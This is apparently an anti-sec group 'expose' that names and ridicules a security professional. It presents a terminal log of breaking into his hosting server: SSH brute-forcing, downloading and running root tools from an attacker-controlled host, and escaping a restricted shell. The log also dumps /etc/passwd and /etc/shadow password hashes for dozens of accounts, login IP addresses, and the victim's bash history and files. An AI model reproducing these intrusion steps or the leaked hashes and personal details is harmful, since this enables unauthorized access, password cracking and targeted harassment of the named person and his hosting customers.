__ .__
_____ ____ _/ |_ |__| ______ ____ ____
\__ \ / \\ __\| | ______ / ___/_/ __ \_/ ___\
/ __ \_| | \| | | | /_____/ \___ \ \ ___/\ \___
(____ /|___| /|__| |__| /____ > \___ >\___ >
\/ \/ \/ \/ \/group.
anti-sec:~# cd expose/
anti-sec:~/expose# cat glafkos.info
Glafkos Charalambous AKA nowayout / nowayin, You may know him from his contributions to the security scene:
- http://www.milw0rm.com/papers/186 ~ Securing and Hardening Linux v1.0
- http://www.milw0rm.com/papers/286 ~ Bypassing Windows Server 2008 Password Protection
- http://www.milw0rm.com/exploits/7216 ~ WebStuido CMS Blind SQL Injection
- http://www.milw0rm.com/exploits/7722 ~ DZcms Remote SQL Injection
... and a couple of thousand *lethal* XSS exploits...
He was also part of Astalavista ( RIP ) staff. Looks like everyone involved in that cult is a security expert.
Websites owned and managed by nowayout:
- http://www.infosec.org.uk ~ Information Security Uncensored / Exploits / MD5 Cracker / Default Ports / Tools / Security News / Videos / Papers
- http://www.itsolutionskb.com ~ IT Solutions Knowledge Base
- http://www.md6.me ~ MD6 Hash Calculator
- http://www.defaultports.com ~ Default DB Ports, Computer Ports, TCP/UDP Ports, Services, Protocols
- http://www.scanpc.org ~ Your FREE Online Port Scanne
- http://www.webhostline.com ~ His little hosting company
Quotes from his CV:
- B.Sc. in Computer Science;
System Analysis & Design, Digital Logic, Database Management, Assembly, Local & Metropolitan Area Networks,
Data Communications & Computer Networks, Operating Systems, Software Engineering, Advanced Programming in UNIX Environment,
Computer Graphics, Object Oriented Programming, Compiler Writing, Machine Learning, Artificial Intelligence,
Parallel Processing, Internet Technologies, Multimedia Programming (Java), Image & Signal Processing,
Algorithms & Complexity, Programming Languages, Object Oriented Database Management, Visual Programming,
Advance Numerical Methods, Computer Aided Design, Logic Programming, Data Structures, Mathematics
- Work:
Managed IT Services Coordinator
Setup and Configuration of Business Application Solutions
Users Training
Users Support
Systems Security, Maintenance, Monitoring, Reporting
Security Consulting
Hosting Management
Server(s) maintenance/management (AD, Group Policies, ISA, MSSQL, IIS, Exchange, Remote Access, VPN)
Network maintenance/management (Switch, Routers, Wireless)
Internet, Intranet, Backups, Antivirus & WSUS maintenance/management
Website Design & Backend support
Helpdesk support & monitoring
Installation & Maintenance of client computers
IT Department Policies
Software Development
Penetration Testing/System Security
- Computer Skills ( We believe he posses _none_ ):
Vulnerability testing, network security auditing as well as
extensive experience in hardening/securing GNU/Linux & Windows public facing servers including web, ftp & email servers
Programming languages: Assembly, C/C++, Java, Visual Basic 6/.NET, C# .NET, Perl, Python
Web Programming/Scripting languages: JSP, Servlets, ASP, PHP, Perl, XHTML, AJAX, JavaScript
Relational Database Management Systems (RDBMS MySQL/MSSQL) and database design
Expert user/administrator of Microsoft DOS, Windows 95/98/NT/2000/XP/Vista/2003/2008
as well as their server equivalent incarnations and various *BSD, GNU/Linux operating systems
(FreeBSD, OpenBSD, Slackware, SUSE, CentOS, Mandrake, Red Hat, Ubuntu, BackTrack)
Extensive, hands-on, experience with various graphic related computer packages (Photoshop, Fireworks etc.)
Extensive experience with various web design related computer packages (Dreamweaver, Flash etc.)
Extensive experience with MS-Office (Word, Excel, Access, PowerPoint, Outlook)
Extensive experience in administrating/securing GNU/Linux & Windows public facing servers
A decade of experience in troubleshooting, technical, hardware and network related, problems
- Certifications ( What kind of an idiot passes a certificate of any kind to this moron? ):
Cisco Certified Network Associate - (CCNA)
Certified Ethical Hacker - (CEH)
Computer Hacking Forensic Investigator - (CHFI)
Network Security Administrator - (NSA)
Certified Security Analyst - (ECSA)
Licensed Penetration Tester - (LPT)
Microsoft Certified IT Professional - (MCITP)
Microsoft Certified Technology Specialist - (MCTS)
- Interests:
I enjoy taking on challenges on Penetration Testing, Network Security, Programming, Logic, Reverse Engineering, Steganography
and Cryptology on various security related websites (ref: hackits.de handle: nowayout)
I enjoy reading programming and security related books and I have a sizeable library of relevant books and references.
Astalavista.com/.net - The hacking & security community - Administrator (One of the biggest security related site worldwide) ( *We beg to differ* *wink* )
BlackHat-Forums.com - Administrator in a well known forum for security professionals to share and discuss security related information
Writing advisories and exploits for system and web vulnerabilities
- Publications:
Reverse Engineering: Anti-Cracking Techniques Paper
Reverse Engineering: Smashing The Signature Paper
Securing & Hardening Linux v1.0 Paper
802.11 WPA-PSK Crack Video Tutorial
802.11 Packet Injection in Windows Video Tutorial
Holy crap! With that kind of CV, you would expect the person to *actually* know
his way around computers, securing systems, having flawless code, etc.
After we saw him poking around the Astalavista Exposure trying to find out who was behind it,
we decided to take a look at his box(es).
After all, we're not supposed to find anything...
...right?
EOF.
anti-sec:~/expose# cd ~/pwn/
anti-sec:~/pwn# ./infoz infosec.org.uk
IP: 66.96.220.213
NS:
- ns1.webhostline.com
- ns2.webhostline.com
Mail Server:
- 66.96.220.213 > 6696220213.hostnoc.net
WWW Server:
Apache
SSH Banner:
SSH-2.0-OpenSSH_4.3 : PORT 2222
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
[+] openPWN - anti-sec group
[+] Target: 66.96.220.213
[+] SSH Port: 2222
[+] List: users.txt
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
user: crownvip
uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux
sh-3.1$ export HISTFILE=/dev/null
sh-3.1$ w
11:23:39 up 306 days, 1:02, 1 user, load average: 0.77, 0.62, 0.64
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sh-3.1$ who
infosec pts/2 2009-06-05 06:41 (91.184.220.239)
// We got in, while he is -on- the server... is he going to catch us ( considering his amazing CV )? lets wait and see...
sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/usr/local/cpanel/bin/jailshell
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env
// Awww, jailshell...
sh-3.1$ wget http://anti.sec.labs/MichaelScofield
--13:33:37-- http://anti.sec.labs/MichaelScofield
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `MichaelScofield'
100%[=========================================================================================================================================>] 4,921 --.-K/s in 0.08s
11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921]
sh-3.1$ chmod +x MichaelScofield
sh-3.1$ ./MichaelScofield
[+] MichaelScofield - Prison Breaker / anti-sec group
[+] Grabbing environment variables...
SHELL=/usr/local/cpanel/bin/jailshell
[+] Injecting new shell..
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
SHELL=/bin/sh
sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/bin/sh
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env
// Prison Break FTW.
sh-3.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
x00mario:x:32007:32009::/home/x00mario:/usr/local/cpanel/bin/jailshell
defaultp:x:32008:32010::/home/defaultp:/usr/local/cpanel/bin/jailshell
astalavi:x:32009:32011::/home/astalavi:/usr/local/cpanel/bin/noshell
whitelig:x:32010:32012::/home/whitelig:/usr/local/cpanel/bin/jailshell
divecom:x:32011:32013::/home/divecom:/usr/local/cpanel/bin/noshell
glafkos:x:32012:32014::/home/glafkos:/usr/local/cpanel/bin/noshell
infosec2:x:32013:32015::/home/infosec2:/usr/local/cpanel/bin/jailshell
whitegr:x:32014:32016::/home/whitegr:/usr/local/cpanel/bin/jailshell
glafcom:x:32015:32017::/home/glafcom:/usr/local/cpanel/bin/jailshell
webhostl:x:32016:32018::/home/webhostl:/usr/local/cpanel/bin/jailshell
infosec:x:32017:32019::/home/infosec:/bin/bash
ryb:x:32018:32020::/home/ryb:/usr/local/cpanel/bin/jailshell
ariadmin:x:32019:32021::/home/ariadmin:/usr/local/cpanel/bin/noshell
indianos:x:32020:32022::/home/indianos:/usr/local/cpanel/bin/noshell
nowayin:x:32021:32023::/home/nowayin:/usr/local/cpanel/bin/noshell
forextrd:x:32022:32024::/home/forextrd:/usr/local/cpanel/bin/jailshell
itteam:x:32023:32025::/home/itteam:/bin/bash
itkb:x:32024:32026::/home/itkb:/bin/bash
infosecs:x:32025:32027::/home/infosecs:/usr/local/cpanel/bin/noshell
toxworx:x:32026:32028::/home/toxworx:/usr/local/cpanel/bin/noshell
scanpc:x:32027:32029::/home/scanpc:/bin/bash
mako:x:32028:32030::/home/mako:/bin/bash
bufferov:x:32029:32031::/home/bufferov:/bin/bash
exploitm:x:32030:32032::/home/exploitm:/usr/local/cpanel/bin/jailshell
md5org:x:32031:32033::/home/md5org:/bin/bash
webtech:x:501:501::/home/webtech:/usr/local/cpanel/bin/jailshell
mariosto:x:502:502::/home/mariosto:/usr/local/cpanel/bin/noshell
md6me:x:510:510::/home/md6me:/bin/bash
royallim:x:511:511::/home/royallim:/usr/local/cpanel/bin/noshell
crownvip:x:513:513::/home/crownvip:/usr/local/cpanel/bin/jailshell
dnsmafia:x:514:514::/home/dnsmafia:/bin/bash
sh-3.1$ uname -a
Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux
sh-3.1$ wget http://anti.sec.labs/r00tr00t
--13:33:37-- http://anti.sec.labs/r00tr00t
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207614 (203K) [text/plain]
Saving to: `r00tr00t'
100%[=========================================================================================================================================>] 207,614 445K/s in 0.5s
14:33:02 (445 KB/s) - `r00tr00t' saved [207614/207614]
sh-3.1$ chmod +x r00tr00t
sh-3.1$ ./r00tr00t
[+] r00tr00t - anti-sec group
[+] "Root is a state of mind"
r0000000000000000000000000000t
state achieved.
sh-3.1# cat /etc/shadow
root:$1$xm86ZzkL$bQdr6VN7uOw1Ar7vlFD1B/:14085:0:99999:7:::
[snip]
x00mario:$1$9XAEe8Rf$J3XgPozk2i7iuI5eUIpjt.:14168:0:99999:7:::
defaultp:$1$d6jvruJw$8uJrpBNHCI2q.2z7on.ql/:14272:0:99999:7:::
astalavi:$1$yUNU3lEZ$vKz7vTcAvp4jMi6VU1x/B1:14085:0:99999:7:::
whitelig:$1$uJJARut7$gjdZTs/phGRWW57tgoqLG.:14085:0:99999:7:::
divecom:$1$wmhcRfR7$9fqUHAk9AcKdSfjrxYiUZ/:14085:0:99999:7:::
glafkos:$1$hm0QE06x$sXXNM12w0UYw.PtA7Tyho.:14085:0:99999:7:::
infosec2:$1$ySWf10d8$ZFQVBABuoYrqvClq9/Hlp/:14085:0:99999:7:::
whitegr:$1$kWQJ8jA2$DcaUTvfmle9KkzM7JOcFr.:14085:0:99999:7:::
glafcom:$1$zQsYWYtk$P0ey4cYCasgnAI56tqxGd.:14085:0:99999:7:::
webhostl:$1$RMkUH7oE$2N5BIbDBKKLIjHNamWjWo.:14365:0:99999:7:::
infosec:$1$XPuGjU6/$heLW/bq6CwLVaQYmKhusQ0:14085:0:99999:7:::
ryb:$1$fRYpFuUS$S.EvITiqZGNyMC4GeOPrF.:14086:0:99999:7:::
ariadmin:$1$YDqKvJNU$MC0OpYHqqVIctgnndwsUC0:14087:0:99999:7:::
indianos:$1$a9qbBXl1$Js66FA5mcwwXGeOnqJcfz/:14121:0:99999:7:::
nowayin:$1$yk7__joq$nu37bgAkc0w5goAxb8n9D1:14141:0:99999:7:::
forextrd:$1$ZWrANLSA$yNM3vX1BNpY.N01QuLQs8/:14150:0:99999:7:::
itteam:$1$LHskTuym$DwTjniwuOeWOBgrlR69V7/:14176:0:99999:7:::
itkb:$1$iC4hvUS7$Q2xbPLGeQ3mQ23Ms8Or/d/:14272:0:99999:7:::
infosecs:$1$DbsRaxJY$9/FPxis9LlDvC8g68uQX/.:14176:0:99999:7:::
toxworx:$1$RLXK1IOI$oVD.9vW23LZvqO2qGOcTS0:14185:0:99999:7:::
scanpc:$1$OrBmwxcY$x99Dfuz/aXgQwlo2GnLBu.:14189:0:99999:7:::
mako:$1$.OiJ8FGc$UDAHAv6qImKoBwnoZxOwz1:14213:0:99999:7:::
bufferov:$1$5SgPTS1q$EqYsfnpq84VfPEzYRgf2P0:14214:0:99999:7:::
exploitm:$1$sdfoKEGa$WNIv/KC2/LwB3pyu6AECD.:14214:0:99999:7:::
md5org:$1$RxzDlNEl$isPFAmLWyuZgr9OJ7a/7R1:14247:0:99999:7:::
webtech:$1$n35djEg8$cNPz.nG6tRDok4mdUHSwW/:14365:0:99999:7:::
mariosto:$1$hEz88KSv$9T7WKLEp6hKfKUXACP/Qm/:14270:0:99999:7:::
md6me:$1$h660cR_M$nldIHgTpP8L0jgFrPOvHw.:14338:0:99999:7:::
royallim:$1$YaiR6rGi$neRBspL0cFhT1rMYyKl6J0:14347:0:99999:7:::
crownvip:$1$M07FZatl$TuX/UR7CZmK3HVptnKcne1:14403:0:99999:7:::
dnsmafia:$1$656LevHM$oPnT4n7jXeipQO3G4NMfH.:14371:0:99999:7:::
sh-3.1# lastlog | grep -v Never
Username Port From Latest
defaultp pts/6 91.184.220.239 Wed May 6 02:46:02 -0400 2009
glafcom pts/0 213.207.156.52 Tue Sep 30 02:28:48 -0400 2008
webhostl pts/1 91.184.220.239 Sun May 24 05:09:36 -0400 2009
infosec pts/2 91.184.220.239 Fri Jun 5 06:41:51 -0400 2009
itkb pts/3 91.184.220.239 Mon Jun 8 11:41:16 -0400 2009
scanpc pts/4 91.184.220.239 Wed May 6 02:35:33 -0400 2009
mako pts/1 67.225.142.98 Thu May 21 06:14:56 -0400 2009
md5org pts/2 91.184.220.239 Sat Jan 3 14:27:24 -0500 2009
webtech pts/0 79.101.197.121 Fri Feb 20 10:58:09 -0500 2009
md6me pts/2 91.184.220.239 Mon Jun 1 14:14:18 -0400 2009
royallim pts/3 91.184.220.239 Mon May 11 04:20:45 -0400 2009
crownvip pts/4 91.184.220.239 Mon Jun 8 12:14:08 -0400 2009
// Lets see what Mr Glafkos got on his server...
sh-3.1# cd ~infosec
sh-3.1# ls -la
total 368
drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .
drwxr-xr-x 43 root root 4096 Jun 8 00:20 ..
lrwxrwxrwx 1 infosec infosec 33 Jul 25 2008 access-logs -> /usr/local/apache/domlogs/infosec
-rw-r--r-- 1 infosec infosec 24 Feb 23 2007 .aspell.en.prepl
-rw-r--r-- 1 infosec infosec 21 Feb 23 2007 .aspell.en.pws
-rw------- 1 infosec infosec 15255 Jun 5 07:04 .bash_history
-rw-r--r-- 1 infosec infosec 24 Jan 26 2007 .bash_logout
-rw-r--r-- 1 infosec infosec 191 Jan 26 2007 .bash_profile
-rw-r--r-- 1 infosec infosec 124 Jan 26 2007 .bashrc
drwx------ 23 infosec infosec 4096 May 9 12:23 bck
-rw------- 1 infosec infosec 22 May 17 06:19 .contactemail
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 .cpaddons
-rw-r--r-- 1 infosec infosec 0 Feb 9 2007 .cpaddons_notify
drwxr-xr-x 5 infosec infosec 4096 Jan 8 17:18 .cpanel
-rw-r----- 1 infosec infosec 1 Jan 15 00:05 cpbackup-exclude.conf
drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 cpmove.psql
-rw-r--r-- 1 infosec infosec 14 Jun 8 14:03 .dns
-rw-r--r-- 1 infosec infosec 7661 Jan 19 04:21 domain.txt
drwx------ 2 infosec infosec 4096 Mar 11 2007 .elinks
-rw-r--r-- 1 infosec infosec 383 Jan 26 2007 .emacs
-rw-r--r-- 1 root root 416 Jul 29 2008 error_log
drwxr-x--- 3 infosec mail 4096 Jun 9 2008 etc
drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 .fantasticodata
-rw------- 1 infosec infosec 16 May 26 00:04 .ftpquota
drwx------ 2 infosec infosec 4096 Jun 9 2008 .gnupg
-rw-r--r-- 1 infosec infosec 348 Oct 22 2007 .gpgtemp
-rwxr-xr-x 1 infosec infosec 205 Mar 9 2008 host2port.sh
-rw-r--r-- 1 infosec infosec 1315 Mar 20 2008 host.c
-rw-r--r-- 1 infosec infosec 1393 Mar 5 2008 hostnames.c
drwxr-x--- 2 infosec nobody 4096 Jul 25 2008 .htpasswds
-rw-r--r-- 1 infosec infosec 2048 Mar 19 05:57 infosecbackup.php
-rwxr-xr-x 1 infosec infosec 673 Nov 3 2008 infosecbackup.sh
-rw-r--r-- 1 infosec infosec 7 Jul 25 2008 .lang
-rw------- 1 infosec infosec 14 Jun 8 12:15 .lastlogin
drwx------ 2 infosec infosec 4096 Aug 11 2007 logs
drwxrwx--- 11 infosec infosec 4096 Jul 25 2008 mail
-rw-r--r-- 1 infosec infosec 36 Jan 26 2007 .mailboxlist
drwxr-xr-x 2 infosec infosec 4096 Nov 27 2008 md5proc
-rw------- 1 infosec infosec 1 Jun 6 2007 mysql-db-count
-rw------- 1 infosec infosec 404 Apr 15 2008 .mysql_history
drwx------ 2 infosec infosec 4096 Feb 15 2007 .neomail
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-glafkos
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-ishtus
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-yiannos
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 perl
-rw-r--r-- 1 infosec infosec 782 Oct 13 2007 popdel.py
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 psd
drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 public_ftp
drwxr-x--- 33 infosec nobody 4096 May 9 12:27 public_html
-rw-r--r-- 1 infosec infosec 75671 Mar 28 2008 rfibot.pl
drwx------ 2 infosec infosec 4096 Jun 8 14:01 .spamassassin
-rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinboxenable
-rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinenable
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 spike
-rw-r--r-- 1 infosec infosec 41558 Nov 23 2007 spike_phpSecAudit_0.27.zip
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .sqlier
drwx------ 2 infosec infosec 4096 Jun 9 2008 .sqmaildata
drwx------ 4 infosec infosec 4096 Jun 9 2008 ssl
-rw-r--r-- 1 infosec infosec 1803 Mar 8 2008 test.c
drwxr-xr-x 7 infosec infosec 4096 Jun 8 12:16 tmp
drwx------ 2 infosec infosec 4096 May 30 2007 .trash
lrwxrwxrwx 1 infosec infosec 11 Jul 25 2008 www -> public_html
-rw-r--r-- 1 infosec infosec 658 Jul 25 2008 .zshrc
sh-3.1# cat .bash_history
php remotesearch.php
nano remotesearch.php
[snip x 100000]
lynx http://www.md5oogle.com/decrypt.php?input=
ls
php remotesearch.php
nano remotesearch.php
php remotesearch.php
ps -x
kill -9 30000
kill -9 30008
kill -9 30009
kill -9 30108
kill -9 30494
[snip]
cat cracked.txt
rm cracked.txt
rm notfound.txt
rm queue.txt
mv queue2.txt queue.txt
[snip]
rm notfound.txt
cat cracked.txt
rm cracked.txt
clear
php remotesearch.php
cat cracked.txt
wc -l cracked.txt
wc -l notfound.txt
wc -l queue.txt
cat notfound.txt
nano notfound.txt
wc -l queue.txt
wc -l queue.txt
wc -l notfound.txt
wc -l cracked.txt
df -h
mem
top
ls
[snip]
cat cracked.txt
cd www
cd md5/
cd scripts/
wc -l cracked.txt
nano readmd5hash.php
php readmd5hash.php
clear
ls
[snip]
ls -la out.sql
cat out.sql
cd rc
ls
cd ..
ls
cd _php
ls
cd md5/
ls
nano ajaxcalc.php
pwd
nano ajaxcalc.php
[snip]
cat cracked.txt
wget http://milw0rm.com/mil-dic.php <-- milw0rm fanboy.
php md5import.php mil-dic.txt
cat queue.txt
nano autocracker.php
php autocracker.php
wc -l queue.txt
cat queue.txt
ls
[snip]
nano md5.php
nano md5.php
nano md5.php
$req = mysql_query("INSERT INTO $dbtabl (id, md5, plaintext) VALUES ('','$result', '$string')") or die($msger3);
cd ..
cd md5/
cd scripts/
wc -l crack
wc -l cracked.txt
cat cracked.txt
[snip]
rm notfound.txt
ifconfig -a
ping 10.0.7.198
su
ls -la
[snip]
cat md5sorted.txt | cut -d";" -f 2
cat md5sorted.txt | cut -d";" -f 2 > md5plaintext.txt
[snip]
nano domains.html
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview">"
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview\">"
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview
"
wc -l domains.html
cat domains.html | grep uibs.net
cat domains.html | grep uibs.net | cut -d ">"
cat domains.html | grep uibs.net | cut -d ">" -f 1
cat domains.html | grep uibs.net | cut -d ">" -f 2
cat domains.html | grep domainOverview | cut -d ">" -f 2
cat domains.html | grep =domainOverview | cut -d ">" -f 2
[snip]
cd /dev/sda4
mount
cd /
dir
ls -la
rm 32-libata.tar.gz
su
su
exit
su
info@sec.org.uk
[snip]
ls -la
crontab -l
su
df -h
su - root
cd www
ls
su
last
lastlog
[snip]
ls
wget http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz
unzip dnsenum1.2.tar.gz
tar -zxvf dnsenum1.2.tar.gz
cd dnsenum1.2
ls
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl charpilakoutas.com.cy
./dnsenum.pl charpilakoutas.com.cy -f dns.txt <-- Certified Ethical Hacker's best friend.
ftp nowayout.no-ip.org
su
crontab -l
ping taveli.com
[snip]
su
nmap -v -P0 mail.sobohgroup.com <-- Network Security Administrator's best friend.
nmap -v -P0 213.207.162.192
nmap -v -P0 mail.sobohgroup.com
[snip]
ftp nowayout.myftp.org
cd www
ls
cd themes/
[snip]
cat cpbackup-exclude.conf
cd www
ls
d -sch
du -sch
ls
rm -r *.rar
ls
du -h --max-depth=1
[snip]
tar --help | grep bzip <-- He shows serious Linux skills, phear.
tar --help | grep bz2
sh-3.1# cd bck
sh-3.1# ls -la
total 3800
drwx------ 23 infosec infosec 4096 May 9 12:23 .
drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 ..
drwxr-xr-x 9 infosec infosec 4096 Jun 9 2008 administrator
drwxr-xr-x 4 infosec infosec 4096 Jun 9 2008 ajaxmd5
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 cache
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 ceh
drwxr-xr-x 2 infosec infosec 4096 Feb 16 2007 cgi-bin
-rw-r--r-- 1 infosec infosec 99938 Dec 24 2006 CHANGELOG.php
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 code
drwxrwxrwx 29 infosec infosec 4096 Jun 9 2008 components
-rw-rw-rw- 1 infosec infosec 2709 Aug 2 2007 configuration.php
-rw-r--r-- 1 infosec infosec 4251 Dec 24 2006 configuration.php-dist
-rwxrwxrwx 1 infosec infosec 294 Jun 2 2007 cookies.php
-rwxrwxrwx 1 infosec infosec 198 Jun 2 2007 cookies.txt
-rw-r--r-- 1 infosec infosec 3429 Dec 24 2006 COPYRIGHT.php
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 editor
-rw-r--r-- 1 nobody nobody 535 Aug 2 2007 error_log
drwxr-xr-x 7 infosec infosec 4096 Jun 9 2008 exam
-rw-r--r-- 1 infosec infosec 3535 Feb 9 2007 globals.php
-rw-r--r-- 1 infosec infosec 145 Mar 1 2007 hello.pl
drwxr-xr-x 3 infosec infosec 16384 Jun 9 2008 help
drwxrwxrwx 7 infosec infosec 4096 Jun 9 2008 images
drwxr-xr-x 10 infosec infosec 4096 Jun 9 2008 includes
-rw-r--r-- 1 infosec infosec 5223 Feb 9 2007 index2.php
-rw-r--r-- 1 infosec infosec 8491 Feb 9 2007 index.php
drwxr-xr-x 2 infosec infosec 4096 Apr 21 2007 infosecis
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 language
-rw-r--r-- 1 infosec infosec 17977 Dec 24 2006 LICENSE.php
-rw-r--r-- 1 infosec infosec 710 Dec 24 2006 mainbody.php
drwxrwxrwx 8 infosec infosec 4096 Jun 9 2008 mambots
drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 md5
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 media
drwxrwxrwx 15 infosec infosec 4096 Jun 9 2008 modules
-rw-r--r-- 1 infosec infosec 3555493 May 27 2007 nvdcve-2007.xml
-rw-r--r-- 1 infosec infosec 2474 Dec 24 2006 offlinebar.php
-rw-r--r-- 1 infosec infosec 4929 Dec 24 2006 offline.php
-rw-r--r-- 1 infosec infosec 709 Dec 24 2006 pathway.php
-rw-r--r-- 1 infosec infosec 286 Dec 24 2006 robots.txt
-rwxrwxrwx 1 infosec infosec 0 Jun 2 2007 steal.php
drwxr-xr-x 5 infosec infosec 4096 Jun 9 2008 tabs
drwxrwxrwx 10 infosec infosec 4096 Jun 9 2008 templates
-rw-r--r-- 1 infosec infosec 9641 May 27 2007 vuln.php
drwxrwxr-x 4 infosec infosec 4096 Jun 9 2008 xcms
sh-3.1# cat configuration.php
sh-3.1# cat cookies.php
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
// Ph34r the CEH, he logs your cookies.
sh-3.1# cat hello.pl
#!/usr/bin/perl
use strict;
use CGI ':standard';
print header;
print start_html('Hello World');
print h1('Hello World');
print end_html();
exit;
// Hai :]
sh-3.1# head vuln.php
#!/usr/bin/php -q
rn";
$to=$_POST['to'];
$from=$_POST['from'];
